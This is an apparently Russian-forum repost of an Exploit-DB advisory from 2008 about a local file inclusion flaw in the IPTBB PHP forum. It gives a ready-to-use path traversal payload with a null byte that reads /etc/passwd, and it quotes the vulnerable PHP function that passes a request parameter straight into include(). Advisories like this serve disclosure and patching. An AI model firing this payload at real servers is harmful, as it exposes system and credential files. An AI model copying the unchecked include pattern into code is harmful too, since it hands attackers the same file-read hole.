- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5874
- Проверка EDB
-
- Пройдено
- Автор
- STORM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-06-20
Код:
____ _ _ _ ___ __ _ __
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm
IPTBB is a free forum system built using PHP and mysql.
Local File Inclusion
Local File Inclusion
--------------------
index.php?act=../../../../../../etc/passwd%00
function action($page){
$page="main/".$page.".php";
//Include the template maker
//Get the settings
$setting = array();
$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");
while ( $row = mysql_fetch_array( $sql ) ){
$setting["{$row['name']}"] = $row['value'];
}
require_once('tpl.class.php');
$tpl = new template;
$fileurl = 'templates/';
$template = $setting['template'] . '/';
include($page);
}
# milw0rm.com [2008-06-20]- Источник
- www.exploit-db.com
